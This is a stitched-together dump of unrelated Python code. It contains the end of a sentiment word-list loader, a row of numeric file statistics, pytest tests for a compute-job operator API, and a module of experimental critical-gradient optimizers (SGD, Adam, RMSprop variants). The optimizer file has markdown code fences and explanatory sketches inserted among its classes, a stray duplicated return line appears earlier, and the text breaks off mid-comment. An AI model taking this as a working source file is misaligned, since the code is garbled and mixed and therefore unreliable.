    level5_words_cn = []    # degree level 5
    level6_words_cn = []    # degree level 6
    fouding_words_cn = []   # negation words


def _load_words(path):
    """Read one entry per line from path, stripping the trailing newline."""
    words = []
    with open(path, encoding='UTF-8') as file:
        for line in file:
            words.append(line.rstrip('\n'))
    return words


def getAllList():  # load every rule list (to be made multi-threaded later)
    allList = AllList()
    # sentiment analysis (English)
    # assignment (rather than appending to the shared class-level lists) keeps
    # repeated calls from accumulating duplicates
    allList.positive_words_eng = _load_words("emotion_dict/eng/pos.txt")
    allList.negative_words_eng = _load_words("emotion_dict/eng/neg.txt")
    allList.level1_words_eng = _load_words("emotion_dict/eng/level1.txt")
    allList.level2_words_eng = _load_words("emotion_dict/eng/level2.txt")
    allList.level3_words_eng = _load_words("emotion_dict/eng/level3.txt")
    allList.level4_words_eng = _load_words("emotion_dict/eng/level4.txt")
    allList.level5_words_eng = _load_words("emotion_dict/eng/level5.txt")
    allList.level6_words_eng = _load_words("emotion_dict/eng/level6.txt")
    allList.fouding_words_eng = _load_words("emotion_dict/eng/fouding.txt")

    # sentiment analysis (Chinese)
    allList.positive_words_cn = _load_words("emotion_dict/cn/pos.txt")
    allList.negative_words_cn = _load_words("emotion_dict/cn/neg.txt")
    allList.level1_words_cn = _load_words("emotion_dict/cn/level1.txt")
    allList.level2_words_cn = _load_words("emotion_dict/cn/level2.txt")
    allList.level3_words_cn = _load_words("emotion_dict/cn/level3.txt")
    allList.level4_words_cn = _load_words("emotion_dict/cn/level4.txt")
    allList.level5_words_cn = _load_words("emotion_dict/cn/level5.txt")
    allList.level6_words_cn = _load_words("emotion_dict/cn/level6.txt")
    allList.fouding_words_cn = _load_words("emotion_dict/cn/fouding.txt")
    return allList
return allList | 27.924242 | 65 | 0.560318 | 666 | 5,529 | 4.513514 | 0.105105 | 0.025283 | 0.08982 | 0.113772 | 0.816035 | 0.80173 | 0.80173 | 0.80173 | 0.80173 | 0.60479 | 0 | 0.023401 | 0.304395 | 5,529 | 198 | 66 | 27.924242 | 0.75819 | 0.049195 | 0 | 0.652695 | 0 | 0 | 0.113428 | 0.089327 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005988 | false | 0.113772 | 0 | 0 | 0.125749 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
# File: test/test_operator.py (repo: DS-POC/operator-service, license: Apache-2.0)
from operator_service.constants import BaseURLs, Metadata
from . import operator_payloads as payloads
from .conftest import FAKE_UUID
from .kube_mock import KubeAPIMock
from .sql_mock import SQLMock, MOCK_JOB_STATUS
COMPUTE_URL = f'{BaseURLs.BASE_OPERATOR_URL}/compute'
def test_operator(client):
response = client.get('/')
assert response.json['software'] == Metadata.TITLE
def test_start_compute_job(client, monkeypatch):
monkeypatch.setattr(SQLMock, 'expected_agreement_id', payloads.VALID_COMPUTE_BODY['agreementId'])
monkeypatch.setattr(SQLMock, 'expected_job_id', FAKE_UUID)
monkeypatch.setattr(SQLMock, 'expected_owner', payloads.VALID_COMPUTE_BODY['owner'])
monkeypatch.setattr(KubeAPIMock, 'expected_maxtime', payloads.VALID_COMPUTE_BODY['workflow']['stages'][0]['compute']['maxtime'])
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.post(COMPUTE_URL, json={})
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.NO_WORKFLOW_COMPUTE_BODY)
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.NO_STAGES_COMPUTE_BODY)
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.INVALID_STAGE_COMPUTE_BODY)
assert response.status_code == 400
monkeypatch.setenv('ALGO_POD_TIMEOUT', str(1200))
monkeypatch.setattr(KubeAPIMock, 'expected_maxtime', 1200)
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY_WITH_NO_MAXTIME)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
def test_stop_compute_job(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.put(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.put(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.put(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
response = client.put(COMPUTE_URL, json={})
assert response.status_code == 400
def test_delete_compute_job(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.delete(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.delete(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.delete(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
response = client.delete(COMPUTE_URL, json={})
assert response.status_code == 400
def test_get_compute_job_status(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.get(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.get(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.get(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.get(COMPUTE_URL, json={})
assert response.status_code == 400
"""
Collection of experimental optimizers developed during our research.
Included for completeness.
"""
import math
from copy import deepcopy
import torch
from torch.optim import Optimizer
from .prioritydict import priorityDict
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def aggregate(d_p, crit_buf, func, kappa=1.0):
if "sum" in func:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
return torch.add(d_p, crit_buf_)
elif "mid" in func:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
return torch.mul(torch.add(d_p, crit_buf_), 0.5)
elif "mean" in func:
crit_buf_ = crit_buf.gradSum()
crit_buf_.mul_(kappa)
return torch.div(torch.add(d_p, crit_buf_), crit_buf.size() + 1)
else:
raise ValueError("Invalid aggregation function")
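# Illustrative sketch (not part of the original module): the three aggregation
# modes above restated on plain floats, with a list standing in for the
# priorityDict buffer, so each branch's arithmetic is easy to check in isolation.

```python
def aggregate_scalar(d_p, crit_grads, func, kappa=1.0):
    """Scalar analogue of aggregate(); crit_grads is a non-empty list of
    retained gradient values standing in for the critical-gradient buffer."""
    mean = sum(crit_grads) / len(crit_grads)
    if "sum" in func:
        # current gradient plus the (scaled) mean of the buffer
        return d_p + kappa * mean
    elif "mid" in func:
        # midpoint between the current gradient and the scaled buffer mean
        return 0.5 * (d_p + kappa * mean)
    elif "mean" in func:
        # mean over the buffer contents and the current gradient
        return (d_p + kappa * sum(crit_grads)) / (len(crit_grads) + 1)
    raise ValueError("Invalid aggregation function")
```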
class SGD_FIFO(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum', sampling=None, critical_test=True):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        if not 0.0 <= decay < 1.0:
            raise ValueError("Invalid decay value: {}".format(decay))
        if not 0.0 <= topC:
            raise ValueError("Invalid topC value: {}".format(topC))
self._count = 0.0
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(SGD_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_FIFO, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = self._count
if weight_decay != 0:
                    d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc, sampling=sampling)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if critical_test:
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMax().norm()
else:
self.g_analysis['gc_aggr'] += crit_buf.averageTopC()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
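# Why keying the buffer on the step counter yields a FIFO window: the counter
# only grows, so the smallest priority is always the oldest entry and eviction
# by smallest key is eviction by age. A minimal deque-based sketch (class and
# method names are invented here, not part of the module):

```python
from collections import deque


class FIFOGradientWindow:
    """Sliding window over the last `capacity` gradients, mimicking what the
    priorityDict degenerates into when keys increase monotonically."""

    def __init__(self, capacity):
        self.buf = deque(maxlen=capacity)  # deque drops the oldest item itself

    def add(self, grad):
        self.buf.append(grad)

    def grad_mean(self):
        return sum(self.buf) / len(self.buf)
```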
class Adam_FIFO(Optimizer):
"""
Implementation of Adam with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
decay=0.7, kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, aggr='mean', sampling=None,
critical_test=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        if not 0.0 <= decay < 1.0:
            raise ValueError("Invalid decay value: {}".format(decay))
        if not 0.0 <= topC:
            raise ValueError("Invalid topC value: {}".format(topC))
self._count = 0.0
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, aggr=aggr, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay, sampling=sampling,
critical_test=critical_test)
super(Adam_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_FIFO, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = self._count
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider '
'SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc,
sampling=sampling)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
else:
if kappa > 0.:
aggr_grad = aggregate(grad, state['critical gradients'], aggr)
if state['critical gradients'].isFull():
if critical_test:
if grad_norm > \
state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(
grad)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
grad = aggr_grad
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if group['weight_decay'] != 0:
                    grad = grad.add(p.data, alpha=group['weight_decay'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
self.g_analysis['gc'] += state['critical gradients'].averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMax().norm()
else:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].averageTopC()
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
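# The moment updates and bias corrections in the step above, restated on
# scalars. This is a sketch of textbook Adam, not a drop-in for the class;
# the eps placement follows the common formulation rather than this file's
# denom expression, and the function name is invented.

```python
def adam_scalar_step(p, grad, m, v, t, lr=1e-3, beta1=0.9, beta2=0.999, eps=1e-8):
    """One bias-corrected Adam update on floats."""
    t += 1
    m = beta1 * m + (1 - beta1) * grad          # first moment (m_t)
    v = beta2 * v + (1 - beta2) * grad * grad   # second moment (v_t)
    m_hat = m / (1 - beta1 ** t)                # bias-corrected moments
    v_hat = v / (1 - beta2 ** t)
    p = p - lr * m_hat / (v_hat ** 0.5 + eps)
    return p, m, v, t
```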
class RMSprop_FIFO(Optimizer):
"""
Implementation of RMSprop with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=1e-2, alpha=0.99, eps=1e-8, weight_decay=0,
momentum=0, centered=False, decay=0.7, kappa=1.0,
topC=10, aggr='mean', sampling=None, critical_test=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= momentum:
raise ValueError("Invalid momentum value: {}".format(momentum))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        if not 0.0 <= decay < 1.0:
            raise ValueError("Invalid decay value: {}".format(decay))
        if not 0.0 <= topC:
            raise ValueError("Invalid topC value: {}".format(topC))
self._count = 0.0
        defaults = dict(lr=lr, momentum=momentum, alpha=alpha, eps=eps,
                        centered=centered, weight_decay=weight_decay,
                        aggr=aggr, kappa=kappa, topC=topC, decay=decay,
                        sampling=sampling, critical_test=critical_test)
super(RMSprop_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(RMSprop_FIFO, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('momentum', 0)
group.setdefault('centered', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad
grad_norm = self._count
if grad.is_sparse:
raise RuntimeError('RMSprop does not support sparse gradients')
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['square_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['momentum'] > 0:
state['momentum_buffer'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['centered']:
state['grad_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
                else:
                    if kappa > 0.:
                        # Only touch the buffer when critical gradients are enabled;
                        # otherwise state['critical gradients'] does not exist.
                        aggr_grad = aggregate(grad, state['critical gradients'], aggr)
                        if state['critical gradients'].isFull():
                            if grad_norm > state['critical gradients'].pokeSmallest():
                                self.offline_grad['yes'] += 1
                                state['critical gradients'][grad_norm] = deepcopy(grad)
                            else:
                                self.offline_grad['no'] += 1
                        else:
                            state['critical gradients'][grad_norm] = deepcopy(grad)
                        grad = aggr_grad
square_avg = state['square_avg']
alpha = group['alpha']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(p, alpha=group['weight_decay'])
square_avg.mul_(alpha).addcmul_(grad, grad, value=1 - alpha)
if group['centered']:
grad_avg = state['grad_avg']
grad_avg.mul_(alpha).add_(grad, alpha=1 - alpha)
avg = square_avg.addcmul(grad_avg, grad_avg, value=-1).sqrt_().add_(
group['eps'])
else:
avg = square_avg.sqrt().add_(group['eps'])
if group['momentum'] > 0:
buf = state['momentum_buffer']
buf.mul_(group['momentum']).addcdiv_(grad, avg)
p.add_(buf, alpha=-group['lr'])
else:
p.addcdiv_(grad, avg, value=-group['lr'])
return loss
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
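# The uncentered, momentum-free RMSprop arithmetic used above, on scalars:
# a running average of squared gradients scales the step. Illustrative sketch
# only; the function name is made up here.

```python
def rmsprop_scalar_step(p, grad, square_avg, lr=1e-2, alpha=0.99, eps=1e-8):
    """One RMSprop update on floats: update the running average of squared
    gradients, then step the parameter scaled by its square root."""
    square_avg = alpha * square_avg + (1 - alpha) * grad * grad
    p = p - lr * grad / (square_avg ** 0.5 + eps)
    return p, square_avg
```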
class SGD_C_bottom(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Uses the inverse of norm as priority, turning conventional "topC" with "bottomC"
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum', sampling=None, critical_test=True):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        if not 0.0 <= decay < 1.0:
            raise ValueError("Invalid decay value: {}".format(decay))
        if not 0.0 <= topC:
            raise ValueError("Invalid topC value: {}".format(topC))
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(SGD_C_bottom, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_bottom, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
count = 0.0
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = 1 / d_p.norm()
if weight_decay != 0:
                    d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc, sampling=sampling)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if critical_test:
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMax().norm()
else:
self.g_analysis['gc_aggr'] += crit_buf.averageTopC()
crit_buf.decay()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
class Adam_C_bottom(Optimizer):
"""
Implementation of Adam with critical gradients.
Uses the inverse of norm as priority, turning conventional "topC" with "bottomC"
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
decay=0.7, kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, aggr='mean'):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        if not 0.0 <= decay < 1.0:
            raise ValueError("Invalid decay value: {}".format(decay))
        if not 0.0 <= topC:
            raise ValueError("Invalid topC value: {}".format(topC))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, aggr=aggr, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay)
super(Adam_C_bottom, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_C_bottom, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = 1 / grad.norm()
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider '
'SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
else:
if kappa > 0.:
aggr_grad = aggregate(grad, state['critical gradients'], aggr)
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
grad = aggr_grad
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if group['weight_decay'] != 0:
                    grad = grad.add(p.data, alpha=group['weight_decay'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
self.g_analysis['gc'] += state['critical gradients'].averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMax().norm()
else:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].averageTopC()
state['critical gradients'].decay()
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
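# Keying the priority structure on 1/norm, as Adam_C_bottom and SGD_C_bottom
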